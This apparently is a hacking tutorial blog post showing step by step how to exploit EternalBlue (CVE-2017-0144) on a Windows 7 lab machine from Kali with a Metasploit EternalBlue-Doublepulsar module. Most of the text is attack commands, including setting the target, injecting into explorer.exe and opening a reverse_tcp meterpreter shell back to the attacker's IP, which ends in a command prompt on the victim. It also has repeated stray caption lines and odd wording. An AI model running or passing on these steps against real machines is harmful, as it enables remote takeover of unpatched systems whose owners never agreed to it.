Breaching the Windows Server

On March 18, 2019


Introduction

EternalBlue is nothing but an achievement that the National Security Agency (NSA) has actually developed and used. But this was somehow leaked in April 2017 by the hacker group called the Shadow Brokers, and this vulnerability leaked online was then used in the devastating effects of the worldwide WannaCry ransomware attack and NotPetya ransomware. So what this hack does is that the Windows Server Message Block 1.0 (SMBv1) effectively exploits a vulnerability. SMB is a protocol that Windows machines use to share files in the same network. The SMBv1 server was therefore unable to manage specially crafted payloads in this bug, resulting in remote execution of code. This vulnerability has been identified and has already been documented CVE-2017-0144.

So let’s start with our demo

Our Victim: Windows 7 (IP address: 192.168.0.103)

Hacking Windows Server using EternalBlue Exploit

Our Attacker: Kali (IP address: 192.168.0.105)

Hacking Windows Server using EternalBlue Exploit

Until you start, make sure you have wine in your kali. If you don’t type the following commands in your Kali. (Wine is used for exe files or windows applications in many operating systems)

dpkg –add-architecture i386

apt-get update

apt-get install wine32

Next, you need to download the exploit and place it in our database of Metasploit.

So from the relation below, we can get the exploit: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Hacking Windows Server using EternalBlue Exploit

Go to your terminal and type:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Hacking Windows Server using EternalBlue Exploit

You have now accessed the folder where the exploit was downloaded.

Hacking Windows Server using EternalBlue Exploit

Copy the Eternal Blue-Doublepulsar.rb file and place it under the following directory /usr/share/metasploit-framework /module/exploits/windows/smb/

Hacking Windows Server using EternalBlue Exploit

Start your Metasploit program now that all is configured by sort msfconsole

Hacking Windows Server using EternalBlue Exploit

Now serach for eternalblue exploit

Hacking Windows Server using EternalBlue Exploit

Type this to use our double exploit now: use exploit/windows/smb/eternalblue_doublepulsar then type: show options To list all of the choices that we need to fill in.

Hacking Windows Server using EternalBlue Exploit

First, we need to set our remote or target host and the process we want to migrate to, so type the commands below:

set RHOST 192.168.0.103

set PROCESSINJECT explorer.exe

Hacking Windows Server using EternalBlue Exploit

So now we need a payload in our meterpreter to give us a reverse connection:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

Hacking Windows Server using EternalBlue Exploit

Set your host to listen to the reverse link (the IP address of the attacker)

set LHOST 192.168.0.105

Now as everything is setup, just type in exploit and you are ready to go.

Hacking Windows Server using EternalBlue Exploit

Hacking Windows Server using EternalBlue Exploit

And we got our session with the meterpreter. Now just type in shell to give you the command prompt of your victim machine.

Hacking Windows Server using EternalBlue Exploit

NOTE: Metasploit also has a module to test whether or not the victim’s computer is vulnerable to this attack. You could first use this to test and then use the exploit to carry out the attack as explained above. We might use the module auxiliary/scanner/smb/smb_ms17_010 and then set your target host to initiate the scan.

So that’s for now. See you next time.


*

*

*

*